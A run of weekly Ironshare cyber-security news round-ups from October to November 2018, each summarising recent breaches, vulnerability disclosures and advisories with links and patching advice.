Two very high-profile outages occurred on Monday 12th November, for internet giants Facebook and Google. These currently look to be two very different issues, although there were suspicions that these may have been malicious in nature.Facebook suffered an outage that was experienced across the United States, lasting roughly 30 mins and starting at approximately 1300hrs ET. The outage affected all Facebook services including, WhatsApp and Instagram. USA Today reported that Facebook had confirmed that their outage was due to a scheduled test that ultimately failed, although no further information about this test was disclosed.Google on the other hand were not so lucky. Their issue caused a denial of service (DoS) for G Suite and Google Search services and lasted for approximately 74 mins. The issue was blamed on a BGP routing misconfiguration made by a small ISP company in Lagos Nigeria, called MainOne. Ars Technica reports that updates to the Internet’s global routing table made by MainOne, meant that hundreds of IP address ranges belonging to Google were advertised as being reachable through their network. Minutes later China Telecom received and accepted the update, advertising to other large Internet Service Providers, such as the Russian based Transtelecom.These kind of route changes can often go unnoticed, but as traffic destined for Google was redirected to China Telecom, the Great Firewall of China (used to regulate, control and censor Internet traffic within Chinese territories) dropped the traffic at its edge causing the outage.Currently neither of these incidents appear to be the result of malicious actions, but it does continue to question the security limitations within BGP, the internet’s routing protocol. BGP hijacking is not uncommon and we have seen multiple instances dating back to 2010, where China Telecom briefly redirected internet traffic through China, for what can only be malicious intent.Its time we moved away from this trust-based model with BGP and got on with fixing these long-standing security problems.
MiSafes’ leading smartwatch for children, has been found to be extremely easy to hack placing thousands of its child users at risk. Security researchers at Pen Test Partners found that children’s movement and activities could be tracked by malicious actors.GPS sensors and a 2G data connection in the watch allows parents to know their child’s location, can listen in on what the child is doing and also allows the parent to make a call to the child’s watch, all via their smartphone app.Once compromised, malicious actors are capable of gaining real time locations of children, gain personal information from the device, while also sending messages and making calls that appear to be from the parent.No advanced hacking skills were required to compromise these watches, just simple use of free online tools and some basic coding ability.Until the manufacturers of these devices can prove that they have resolved these security issues, Pen Test Partners recommend that you do not use these GPS based watches to track your children.https://www.pentestpartners.com/security-blog/consumer-advice-kids-gps-tracker-watch-security/
Patch Tuesday, for those not familiar with the name, refers to Microsoft’s monthly security update release day, which typically falls on the second Tuesday of the month. The latest Patch Tuesday includes a total of 53 vulnerabilities, 11 are rated Critical, 40 are rated Important, and the remaining two are rated Moderate and Low.Included in these Critical Vulnerabilities are several memory corruption vulns that are present in Microsoft Edge, Windows Deployment Service TFTP Server, Internet Explorer, and the VBScript engine that can all result in local and remote code execution.There are also a number of key vulns rated Important that should not be overlooked. Several remote code execution vulns exist within MS Office products, Outlook & Excel, PowerShell and Internet Explorer. While the Windows Com Aggregator Marshaler can be exploited to gain elevated privileges.Full details can be found at the link below:November Security Update Release Noteshttps://portal.msrc.microsoft.com/en-us/security-guidanceAccompanying the release is an Important advisory for Adobe Flash Player that if exploited can lead to information disclosure and remote code execution. This affects Microsoft Edge and internet explorer browsers as well as Chrome.https://helpx.adobe.com/security/products/flash-player/apsb18-39.htmlDon’t delay, review and get patching now!And that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #17 – 16th November 2018
By
Stuart Hare
on
15/11/18
Welcome to Ironshare’s Cyber Round-up, where we look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
On November 2nd the global banking giant HSBC reported to the California Attorney Generals office that they had suffered a breach of US customer data, that has compromised customer names, addresses, account numbers, balances, transaction history and more.In their notice, HSBC state they identified unauthorised access to online customer accounts between the dates of the 4th and 14th October 2018, and as a result all impacted accounts had online access suspended to prevent further compromise. Further action has been taken to increase the security around the online banking authentication process, while also providing victims with a free subscription the Identity Guard theft protection service.It is believed that the unauthorised access was successfully achieved using a credential stuffing attack. Credential stuffing relies on previously leaked credential data (usernames and passwords), which has been disclosed as part of another potentially unrelated breach. It takes this data and automatically injects these credentials into the system being targeted, in the hope that match will be found, and access will be granted.To reduce the chance of being a victim of a credential stuffing attack, it is crucial that you don’t use the same combination of username and password on more that one site or system.ALWAYS use unique passwords that are not shared with any other service. If you know that you are using the same password for multiple things, then you should go and change them now.If like most of us you are becoming overwhelmed by the amount of passwords you have to remember then its time for you to get a password manager! Go search Google and check out which one is right for you.HSBC notice: https://oag.ca.gov/system/files/Res%20102923%20PIB%20MAIN%20v3_1.pdf
IronChat, an encrypted messaging platform provided on Blackbox Security’s IronPhones, has been cracked by the Dutch police, who were able to listen in on over a 250,000 chat messages of suspected criminals.IronChat has been popular amongst criminal circles for providing the means to communicate confidentially about their illicit activities. Unbeknown to the users their conversations were being monitored by the Dutch police, and resulted in arrests and the seizure of weapons, drugs and cash.BlackBox Security’s Website has since been seized by the authorities and its owners are have been arrested for suspicion of criminal involvement.Check out Graham Cluley’s post on Bitdefender for more details:https://hotforsecurity.bitdefender.com/blog/police-crack-encrypted-chat-service-ironchat-and-read-258000-messages-from-suspected-criminals-20530.html
Security researchers at RIPS Technologies have discovered remote code execution and privilege escalation flaws in the immensely popular WooCommerce WordPress plugin. WooCommerce, is an online shop plugin that’s used by over 4 million websites worldwide.All that is needed to successfully launch this attack is for a compromised user to possess the ‘Shop Manager’ role, which permits them to manage products, customers and orders for the online shop.By simply injecting a malicious payload that deletes certain files, WordPress security checks can be bypassed, allowing the malicious shop manager to take over the WordPress admin account and gain full control to the site.This could be launched through a simple phishing attack, or through Cross Site Scripting (XSS) vulnerabilities.Users who are running WooCommerce should ensure that they have upgraded to at least version 3.4.6, and always keep up to date with the latest releases.Full details and a video showing how simple the compromise is can be found on the RIPSTECH blog:https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/
Multiple critical vulnerabilities have been found in popular self-encrypting solid-state storage devices, that allows a malicious actor to recover protected data by decrypting the disk.Researchers at Radbound University in the Netherlands, reverse engineered the hardware that provides full disk encryption on Crucial and Samsung solid-state drives and found flaws that breaks the encryption on these devices.Issues were found in the ATA Security and TCG Opal implementations, where due to there being no links between the Password and Encryption key, attackers can manipulate the password validation routine in RAM and use any password to decrypt the data.In addition to this Wear levelling exploits were found in Samsung devices, which leaves unprotected encryption keys available for retrieval, while Crucial devices were also found to have blank Master Passwords by default, allowing encrypted data to be retrieved using a blank password.It doesn’t stop there, if you are using BitLocker as your disk encryption of choice, you should be aware that due to BitLocker’s default behaviour of using the hardware encryption available over its own software-based encryption, you will still be vulnerable if using the affected devices.Crucial have since released patches for all its infected devices, while Samsung has provided updates for its T3 and T5 SSD’s.https://thehackernews.com/2018/11/self-encrypting-ssd-hacking.htmlAnd that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #16 – 9th November 2018
By
Stuart Hare
on
9/11/18
Welcome to Ironshare’s Cyber Round-up, where we take a look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
The Information Commissioners Office (ICO), the driving force behind upholding information rights and data privacy, have reported that since the introduction of the General Data Protection Regulation (GDPR) in May of this year, they have witnessed a dramatic 400% increase in disclosed cyber-security incidents.Within the first quarter of this financial year, 414 security incidents were reported to the ICO, jumping from an average of 90 incidents per quarter for the whole of the previous year.This increase coincides with the release of the GDPR which enforced that security incidents must be reported within 72 hours of discovering an attack or breach.In addition, the ICO have highlighted in their report that the main three sectors impacted specifically by data breaches were Health, General Business and Education, while the main victims of other cyber incidents were General Business, Finance & Insurance, and Education.As expected the top attack vector used in these reported incidents was the ‘phishing attack’, followed by the more generic ‘unauthorised access’ and ‘malware’ categories.What is clear from this, is not that there has been a 400% increase in attacks during this period, but that the GDPR is seeing signs of success with its mandated reporting period. That said cyber incidents are continuing to rise at pace, with more data breaches and attacks hitting the news every week.If you do not have an active cyber security strategy in place within your organisation, please get to work on it now, before you become the next victim.https://www.scmagazineuk.com/ico-reveals-400-increase-reports-cyber-security-incidents/article/1496828?bulletin=sc-newswire
Following on from our piece on the PWC Law firms report last week, we came across the Kroll Global Fraud and Risk Report which studies a number of different industrial sectors, analysing the risks associated with Fraud, Cyber and Security incidents.The manufacturing sector has consistently experienced a higher than average percentage of risks associated with Fraud and Cyber Security over the last few years. 86% of manufacturing companies surveyed, stated they had been affected by Fraud and 88% had been the victim of a Cyber Security related incident in the last 12 months.The most common type of fraud reported was in the form of data loss or theft, followed by corruption and bribery. While Virus and worm attacks lead the Cyber risks ahead, of phishing and data breaches.The report also highlights Cyber Security as the key aspect that board members found difficult to remain engaged with or provide meaningful direction to their organisation. Mainly due to complex technology or mechanisms being beyond their understanding.As with a lot of companies, focus is on technology as the major contributor to the success of attacks, which lends to the board issues mentioned above. If we can re-educate our board members in the understanding that, the end-user human element is often the primary cause of such attacks, then maybe they, along with senior leaders, can appreciate the important role they have to play in driving Cyber Security strategy from the top down.This report provides further evidence that no industrial sector or company is immune from the risk of today’s modern cyber-attacks.
The British Airways breach returned to the news late last week, with worrying information that an additional 185,000 customers may have been impacted by the earlier cyber-attack, increasing the scope of the personal information leaked to approximately 565,000 affected passengers.Full credit card information (including CVV numbers and expiry dates), names, billing information and email addresses for 77,000 customers have potentially been compromised. Additionally, personal details and credit card info for 108,000 passengers, this time without CVV, have also been identified.BA claims to not have conclusive evidence that confirms information was actually removed from their systems, but as a precaution they are proceeding as if it is has been.BA now face a huge fine in line with the GDPR, that could be as much as £500m, if the ICO decides to take action. Concerned customers should access the following BA website link for the latest information on what to do if they believe they are impacted.https://www.britishairways.com/en-gb/information/incident/data-theft/latest-information
Researchers at Armis Security have identified two Remote Code Execution vulnerabilities in Texas Instruments Bluetooth Low Energy chips that are found in common Wireless Access Point appliances.Devices affected by these vulnerabilities include Wireless Access Points by Cisco, Meraki and Aruba. Unfortunately, a bigger concern is that these vulnerable chips can also be found in medical devices such as pacemakers and insulin pumps.The first of the two vulns, CVE-2018-16986, exists in the BLE stack, where an attacker that is in the proximity of a vulnerable device, can send a specially crafted BLE frame and trigger a corruption in memory. The attacker is then able to run malicious code and potentially take full control of the device.The second vuln, CVE-2018-7080, exists in the Over the Air Downloads (OAD) feature of the chip’s firmware, and provides a backdoor to the product, simply by sniffing the OAD traffic and capturing the password used. Texas Instruments advises that OAD should be disabled by vendors prior to shipping.Cisco have advised that BLEEDINGBIT is only exploitable on a limited number of devices and is also not present in the default configuration of these devices. The BLE feature and scanning mode must be enabled for their devices to be vulnerable. The Cisco advisory is included below:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181101-ap
During the investigation of an active support case, Cisco have identified a Denial of Service vulnerability in their ASA and FTD security appliances, that can cause excessive CPU usage and has the potential to crash and restart vulnerable devices.The vulnerability exists due to improper handling of SIP traffic, and by sending specially crafted SIP requests, the attacker can trigger the issue on affected devices.Software updates to resolve this bug are currently not available, but there are several workarounds that can assist in the meantime, which include disabling SIP inspection and rate limiting SIP traffic.For details on this bug, the vulnerable devices and the workarounds available, please see the Cisco Advisory linked below:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181031-asaftd-sip-dosAnd that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #15 – 2nd November 2018
By
Stuart Hare
on
2/11/18
Welcome to Ironshare’s Cyber Round-up, where we take a look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
And this time it’s the giant Cathay Pacific in the news for another huge data leak. The Hong Kong airline is reported to have suffered a major leak of customer data, that affects approximately 9.5 million passengers.Cathay’s investigation into the breach, which involved the Hong Kong Police and authorities, has been ongoing for some time, after suspicious activity was detected on their systems back in March 2018. Cathay have confirmed that passenger personal information was accessed without authorisation which included names, addresses, date of births, email addresses, passport numbers, identity cards and credit card information.Criticism has been raised to the amount of time it has taken Cathay to report the breach to its users, but this has been defended by the company, stating that they felt it was key to deliver accurate information, before disclosing the breach, to prevent panic.This news arrives on the back of the data breach at British Airways last month, where 380,000 customer details were stolen. This now looks like a drop in the ocean and is completely overshadowed by the extent of the records lost by Cathay Pacific.Reuters have reported a significant loss in share price, dropping 7% to a 9-year low as a result of the breach, and they are not expecting this to improve in the short term.Cathay Pacific has published an InfoSecurity page which includes information on the breach, and what to do if you think you may have been affected. They also have a twitter account (linked below) for direct contact if required.https://infosecurity.cathaypacific.com/en_HK.htmlTwitter: https://twitter.com/CxInfosec
The publisher Penguin Random house has recently released information warning of a significant increase in phishing scams which started in Asia, and have spread to Europe, the UK and the United States.These scams have targeted agencies and publishers, in order to gain access to sensitive information and attempt to steal manuscripts. The scammers typically pose as legitimate trusted literary agents, using real spoofed email addresses and websites to convince the targets to share the information, before converting the stolen manuscripts to e-books and selling them online.PRH said “Like other companies, Penguin Random House takes all reports of phishing activity and email scams seriously and, when appropriate, notifies its employees to recognize and prevent such attempts. Employee awareness and training, particularly with respect to phishing scams, is a critical component of our company's cybersecurity program,”The NCSC’s guidance to publishing organisations is to remain vigilant to the possibility of phishing attacks. Todays phishing attacks are becoming far more sophisticated and difficult to detect, often including real names, real email addresses and websites. Statements such as this may also be included: 'To show this is not a phishing email, we have included the month of your birth and the last 3 digits of your phone number'.https://www.publishersweekly.com/pw/by-topic/international/Frankfurt-Book-Fair/article/78336-phishing-scam-seeking-manuscripts-spreads-worldwide.htmlFor more information on preparing and protecting yourself from phishing attacks please see the published guidance from the NCSC.https://www.ncsc.gov.uk/phishing
Researchers at Zimperium have identified thirteen vulnerabilities in the market leading FreeRTOS open source real time operating system, that is used by millions of IoT devices and embedded platforms worldwide. FreeRTOS is maintained by Amazon Web Services who took it on-board in 2017.These vulnerabilities, that exist in the FreeRTOS’s TCP/IP stack, include Remote Code Execution, Denial of Service, and Information leakage flaws that can result in the complete compromise of an affected device.Affected versions include, FreeRTOS up to v10.0.1, AWS FreeRTOS up to v1.3.1, the commercial version OpenRTOS, as well as the safety-oriented version called SafeRTOS.Zimperium have collaborated with AWS to produce patches for these vulnerabilities, which are now available in v1.3.2 upwards.If you believe you are running devices that include FreeRTOS or the other versions mentioned above, then it is recommended that you apply patches, or upgrade to the latest firmware as soon as possible.https://blog.zimperium.com/freertos-tcpip-stack-vulnerabilities-put-wide-range-devices-risk-compromise-smart-homes-critical-infrastructure-systems/
The Morrisons data breach case that stretches back to 2014, took another turn this week when the Court of Appeal upheld the initial High Court ruling, that Morrisons were responsible for breaches in employee privacy, and they could now face a massive pay-out to those affected.Andrew Skelton, a senior auditor at Morrisons, was jailed for leaking the payroll data of approximately 100,000 employees, when he posted personal information that included names, bank details and salaries online.This case was brought to Court when over 5500 employees sought compensation for stress related to their personal information being disclosed, and the possible exposure to identity theft and financial loss.Morrisons remain defiant that they did all they could to protect their employees, working to quickly take down the leaked data, and think they should not be held responsible. After another court room loss, they will now progress to the UK Supreme Court, to continue their battle.These types of breaches prove that protecting against the insider threat is as important (if not more important) than protecting against the external threats from the internet. Organisations must defend against the insider threat, by following some base principles:
https://news.sky.com/story/morrisons-faces-vast-data-leak-compensation-payment-11532490
PWC have released their 2018 Annual Law Firm survey results, which highlights that Cyber threats and technology developments rate high in the top concerns for Law firms in the last 12 months.Cyber threats are seen as increasingly common with the Board of Directors, who are now having to focus much more on the real risk posed by attacks, and instances of data loss, that are not going away any time soon.The report states:
“There are many threats to law firms achieving their growth ambitions, but those that cause the biggest concern are Brexit, shortage of talent, cyber threats and technology.”
86% of the Top 10 Law Firms, 92% of the Top 26-50, and 86% of the Top 51-100, see Cyber threats as their biggest risk and cause for concern. As these firms hold large amounts of client data and confidential information, it makes them a greater target for external actors.These levels of concern are warranted, since 60% of firms reported a security related incident throughout the last year, which remains consistent with the reports of 61% in the previous year. The 2018 report can be found below:https://www.pwc.co.uk/industries/law-firms/pwc-law-firms-survey-report-2018-final.pdfThis is more proof that the threat of cyber-attack is prevalent across all industries in today’s internet connected world. Malicious actors are not letting up or taking a break, nor should you.Don’t put off your cyber security plan, or think you won’t be a victim, prepare and improve your cyber defences today, before it’s too late.And that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #14 – 26th October 2018
By
Stuart Hare
on
26/10/18
Welcome to Ironshare’s Cyber Round-up, where we take a look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
News of a data breach at the Pentagon broke earlier this week, which reported that both credit card data and personal information of up to 30,000 civilian and military personnel had been leaked.The source of the breach was not the Pentagon themselves but a third-party vendor that provided travel services for the Defense Department’s staff. For obvious security reasons the Pentagon has decided not to disclose the name of this third party while the investigation continues, but they have confirmed that no classified information was compromised as part of this breach.The investigation into the size and scope of the breach is still ongoing, but a Pentagon spokesman was keen to point out that the data leak was the result of a hack on a single vendor, that provided a service to a small portion of DoD personnel.This is not the first hack or data breach experienced by the DoD, and certainly won’t be the last. The timing of this couldn’t have been worse though, as a damning report recently released by the United States Government Accountability Office, highlighted the critical vulnerabilities present in most weapon systems, that made them susceptible to sophisticated cyber-attacks.https://apnews.com/7f6f4db35b0041bdbc5467848225e67d
The National Cyber Security Centre, the driving force in securing the UK’s cyber defences, has this week released their annual review which details their activities and successes throughout their second year.Since their creation in 2016 the NCSC has strived to make the UK a safer place to live and work online, and this report highlights how they have boldly continued on this path during the last 12 months.The direction, information and published guidance that is produced by the NCSC is excellent, with simple and concise approaches that can be applied to all organisations regardless of type or size.NCSC have been involved in key activities throughout the year, issuing published guidance for small business and charities to improve security, hosting the CyberUK conference in Manchester, established educational courses to get young people into Cyber security, and working with their US counterparts to issues alert on the malicious activity of the Russian government, to name just a few.Combining this with the work they have done during their involvement with hundreds of cyber security incidents and the take down of thousands of malicious sites and domains, the value the NCSC provides to the UK is priceless. We look forward to seeing what is in store for the next 12 months.https://www.ncsc.gov.uk/annual-review-2018/
All major browser vendors have this week officially released noticed on the retirement of the legacy TLS 1.0 and 1.1 protocols, which is due to start in January 2020 with Google Chrome. TLS or Transport Layer Security is the critical security protocol that's used with HTTPS to protect and encrypt our modern-day web traffic.Since the retirement of SSL (Secure Sockets Layer) in June 2015, we have been waiting to hear the fate of the early TLS versions. TLS 1.0 is nearly 20 years old and contains older insecure ciphers, as well as being vulnerable to the BEAST & FREAK attacks.Early this year the industry had a big push to move all sites over to TLS 1.2 in preparation for this retirement, and the likes of Microsoft have plans already in place with their Office 365 SaaS platform, to mandate the use of TLS 1.2 from 31st October 2018, as we covered in a previous post.In August 2018 the IETF approved TLS 1.3 as the new internet security standard, which has paved the way for these legacy versions to be dropped from use. This is all due to start in Jan 2020 when Google removes the support from Chrome, this is followed by Safari and Mozilla Firefox in March 2020, and Microsoft at some point in the first half of 2020.It is recommended that if you are still running services that rely on TLS 1.0 or 1.1, you should start to plan now for upgrading to TLS 1.2 as a minimum. Although the vendors stats suggest that the number of internet connected devices using these protocols is at an all-time low, remember to consider your legacy internal systems also. Depending upon your infrastructure, applications or services this may be a lengthy process to complete, so don’t delay. Links to the vendor notices are contained below:Safari: https://webkit.org/blog/8462/deprecation-of-legacy-tls-1-0-and-1-1-versions/Google: https://security.googleblog.com/2018/10/modernizing-transport-security.htmlMicrosoft: https://blogs.windows.com/msedgedev/2018/10/15/modernizing-tls-edge-ie11/Mozilla: https://blog.mozilla.org/security/2018/10/15/removing-old-versions-of-tls/
If you run Unix, Linux or network systems you will be familiar with the Secure Shell protocol known as SSH. SSH is most commonly used as a remote management command line tool, for securely accessing server or network device consoles for administrative purposes.This week a serious flaw in the open source SSH library ‘libssh’ was released, disclosing that a vulnerability in the libssh code, will allow malicious actors to successfully connect to a device listening for SSH connections, without the need for authentication. Through use of a crafted response during the SSH connection, the actor can convince the device that it has already authenticated, removing the need to provide valid user name and password credentials.This bug is only applicable to libssh and not the more popular OpenSSH implementation.If any of your systems are using libssh, it is strongly advised that you update to the latest versions of code as soon as possible. Also keep in mind that IOT and network devices may be running vulnerable embedded versions of libssh, that would require your device firmware to be upgraded in order to remove this threat.https://nakedsecurity.sophos.com/2018/10/17/serious-ssh-bug-lets-crooks-log-in-just-by-asking-nicely/And that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #13 – 19th October 2018
By
Stuart Hare
on
19/10/18
Welcome to Ironshare’s Cyber Round-up, where we take a look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
October is an important time of the year in Cyber as it marks the European Cyber Security Month (ECSM). ECSM is a campaign that runs from the 1st to 31st October every year, to promote the awareness of Cyber Security to both businesses and the general public.The objectives of the ECSM include providing general Cyber awareness and the promotion of safer internet use for everyone. Each campaign is typically aligned to a general theme or message. This year’s theme is ‘Cyber security is a shared responsibility!’.Too many times we see individuals and organisations making the same mistakes and this is primarily due to a lack of awareness and education. They do things like, focus their security purely on technology, focus only on the external threat, or in terms of organisations, make the IT department solely responsible for Cyber and Information Security.All these are bad decisions, and if we consider that most IT departments and even IT companies today, are still not properly trained or educated in Cyber, we can see how this decision can end in tears.The reality is, it’s our People that remain the biggest threat and thus the weakest link in Cyber Security today.A common error made is to think that attackers won’t target you, as you have nothing of value or your business is too small to be attacked. This couldn’t be farther from the truth. Every individual has an identity and personal information that is of immense value to a cybercriminal. Combining this fact with the ever-increasing breach notifications released on a weekly basis (recent breaches including Facebook, Instagram & British Airways), ensures that any one of us could become a target at any time.Email is still the biggest cause of compromise, with over 95% of successful attacks using email and phishing for their method of attack. Most people have at least one email account, so all it takes is for one person to fall victim to a phishing email, for our network and systems to be compromised.Although not a silver bullet, Cyber awareness aims to help us educate the masses, preventing people from being click happy, getting them to pause for thought and consider whether they should, or really need to click that disguised malicious email link, which is masquerading as your bank, supplier or cloud provider etc.If you are ever in doubt it is safer to delete the email and NEVER click any links.Whether it’s to protect your organisations network and data, or your home networks and personal devices from compromise, we need to educate our families, friends, and co-workers to use good practice when using technology and the internet. We need to realise that this is not just IT’s or someone else’s problem, if we all work together, maybe then we can start to truly share the responsibility of Cyber Security.@CyberSecMonth#CyberSecurityAwarenessMonthhttps://cybersecuritymonth.eu/about-ecsm/whats-ecsm
Copeland Borough Council located in Cumbria has revealed the Cyber-attack which compromised its systems in August 2017, has racked up costs of approximately £2 million, but they will never know if they were the ultimate target, as they host the Sellafield Nuclear Power plant.The August Bank Holiday attack infected multiple UK borough councils with a new zero-day variant of Ransomware, which encrypted the council’s files and demanded a ransom in the form of Bitcoin payment. The impact to the Council was huge making it impossible to carry out day to day activities.It is understood that the council was without basic IT functionality for approximately 10 weeks, which had a huge knock-on impact to other systems such as finance and payroll. Land registry charges, planning and providing fuel for the fleet all suffered, homes could not be purchased, while the backlog of council tax and business rates reached levels of more than 8000.Copeland's chief executive said: "We will never know if we were targeted because we host the largest nuclear site in Europe and are home to 80% of the UK's nuclear waste."But we are of the view that this was a sustained, resourced professional attack. This wasn't a spotty kid in a bedroom. It was an interstate attack."The extent of the attack meant that systems and processes were not full restored until February 2018.This is another example which highlights a successful attack due to a lack of Cyber awareness and training, pressing home the shared responsibility of Cyber security. Copeland have since introduced multiple measures to improve its security, included mandatory cyber security training for all staff and members.Earlier this year a report by Big Brother Watch said that it had received responses from 395 local authorities and that; 114 had said their systems had been breached, 25 reported they had experienced a data loss or breach as a result, and the majority of successful cyber-attacks began with so-called phishing emails designed to trick staff into revealing passwords and other data.As a result of generally poor local authority Cyber practices and a number of high-profile attacks, the NCSC in collaboration with the DCMS and iDEA, are conducting a series of assessments across all UK local authorities, with a goal to improve the security posture and bring them in line with the Cyber Essentials baseline.https://local.gov.uk/copeland-borough-council-managing-cyber-attack
This week VMware disclosed an Important security vulnerability in its virtualisation hypervisor software, that can result in a Denial of Service.VMware vSphere ESXi, VMware Workstation and VMware Fusion are all vulnerable to this flaw, which is found in the 3D-acceleration feature. An attacker with standard user privileges to a guest virtual machine, can cause an infinite loop in the 3D rendering shader, this results in the guest VM becoming unresponsive. This is not isolated to a single VM though as the same issue can occur on other guests, while the physical host running the guest VMs can also become unresponsive.This vulnerability only exists if the 3D acceleration feature has been enabled. ESXi has this feature disabled by default while on Workstation and Fusion it is enabled.Unfortunately, there is no security update to fix this issue, and the workaround is to simply disable the 3D-acceleration feature. You can find how to do this using the knowledge base links below.VMware state: “There is no patch for this issue, customers must review their risk and apply the workarounds if applicable.”Workstation and Fusion: https://kb.vmware.com/s/article/59146ESXi Security Hardening guides: https://www.vmware.com/in/security/hardening-guides.htmlAdvisory: https://www.vmware.com/security/advisories/VMSA-2018-0025.htmlAnd that’s it for this week, please don’t forget to tune in for our next instalment.
To keep up to date with our news and posts why not join our mailing list by using the link to subscribe: http://bit.ly/IronMailListYou can also follow us using the social media links provided.If your business needs to improve its security, kick-start your Cyber plans with our Free Cyber Assessment: http://bit.ly/IronFreeCyberReviewIronshare – Security SimplifiedEdition #12 – 12th October 2018
By
Stuart Hare
on
12/10/18
Welcome to Ironshare’s Cyber Round-up, where we take a look back at the events of that last week and handpick some of the news, posts, views, and highlights from the world of Security.
Thursday 4th October appears to be a big day for the Cyber community, which saw the release of some big stories. Non-seemingly bigger than the Bloomberg Businessweek Bombshell that uncovers the mass infiltration of major US companies by the Chinese.Bloomberg’s BusinessWeek post dubbed “The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies” provides an in-depth account of a top secret 3-year probe into how a tiny pencil tip sized microchip was implanted on the computer motherboards of up to 30 US companies, by the Chinese.With China manufacturing approximately 75% of the worlds mobile phones and PCs it should be no surprise that they would be in a strong position to launch this otherwise very difficult type of hardware attack. It is believed that operatives from the Peoples Liberation Army (PLA) used the motherboard provider Supermicro, who were engaged with the likes of Apple and Amazon, to install these chips during the motherboard manufacturing process.This attack has very far reaching consequences, as it impacted hardware and servers used by Apple, Amazon, the US Department of Defence, CIA drone operations, Navy warships, banks and government contractors.Amazon and Apple have denied these reports, stating they are unaware of the compromise or any such investigation. Unfortunately for them several former senior National Security Officials in the US have countered these denials, during conversations on the investigation which began during the Obama administration.During the investigation a method was developed to monitor the chips activity, without disclosing to the attackers that the chip had been found. During months of monitoring brief check-in communications between the attackers and the compromised servers were detected, but no attempts to remove any data was witnessed.US investigation officials stated: “In Supermicro, China’s spies appear to have found a perfect conduit for what U.S. officials now describe as the most significant supply chain attack known to have been carried out against American companies.”“Think of Supermicro as the Microsoft of the hardware world. Attacking Supermicro motherboards is like attacking Windows. It’s like attacking the whole world.”
A news post released by the NCSC on the 4th Oct, exposes the ongoing campaign of cyber-attacks carried out by the Russian Intelligence service, the GRU. The post confirms that several known actor groups that have been operating around the world are in fact the GRU.Groups that the NCSC have confirmed are associated with the GRU are well known in the community including Fancy Bear, APT28, Strontium & CyberCaliphate.Jeremy Hunt the UK Foreign Secretary stated:“The GRU’s actions are reckless and indiscriminate: they try to undermine and interfere in elections in other countries; they are even prepared to damage Russian companies and Russian citizens.This pattern of behaviour demonstrates their desire to operate without regard to international law or established norms and to do so with a feeling of impunity and without consequences.Our message is clear: together with our allies, we will expose and respond to the GRU’s attempts to undermine international stability.”The post covers several attacks attributed to the GRU over the past 3 years, which include the BadRabbit and VPNFilter attacks.https://www.ncsc.gov.uk/news/reckless-campaign-cyber-attacks-russian-military-intelligence-service-exposedFurther news articles and press conferences broke out throughout Thursday where the British and Dutch Governments joint operations confirmed they had hard evidence of these cyber activities, including Russia’s attempted hack of the UK Foreign Office.Patience with Russia is wearing thin, the UK are prepared and committed to continue working with their allies, to apply and maintain pressure on countering these Russian activities, which NATO has described as “a reckless pattern of behaviour, including the use of force against its neighbours”.
Last Friday Facebook admitted that an unknown actor group had exploited a zero-day vulnerability in their social media platform that allowed them to access and exfiltrate the secret tokens of more than 50 million users, that keep you logged into your Facebook account and supported applications.Technical details of the attack have not been disclosed by Facebook, but they have confirmed that it related to three distinct bugs in the ‘View-As’ feature code (which allows people to view what their own profile looks to someone else) and that the vulnerability has been successfully patched.As a precaution, Facebook has forcibly reset the access tokens of over 90 million users, which logouts all current sessions and initiates the login process when the app is next used.Unfortunately, this is not isolated to the Facebook service alone, if you use your Facebook account to login to third party applications / sites such as Instagram, Tinder, and many others, these will have been affected too.Facebook VP Guy Rosen, explained “The way this works is: let’s say I’m logged into the Facebook mobile app and it wants to open another part of Facebook inside a browser, what it will do is use that single sign-on functionality to generate an access token for that browser, so that means you don’t have to login again on that window.”Rosen also stated that the attackers did not get access to or steal user password’s, so unless you are one of the 90 million logged out users, you should not be affected, and will not need to change your password.https://newsroom.fb.com/news/2018/09/security-update/
Cisco have disclosed a High severity vulnerability in the IOS XE and ASA Firewall code, that could result in an unauthenticated attacker rebooting the affected device.The vulnerability exists in the IPSec driver of multiple products such as the ASR and ISR Routers running IOS XE, and the ASA 5500-X series firewalls with Firepower Threat Defence.By sending malformed IPSec packets using ESP (Encapsulating Security Payload) or AH (Authentication Header) which are processed by an affected device, a remote attacker can exploit this vulnerability and cause a reload of the device.It is recommended to update your devices to the latest fixed versions of software provided by Cisco.For more information and a breakdown of the affected products and software see the link below.https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180926-ipsec
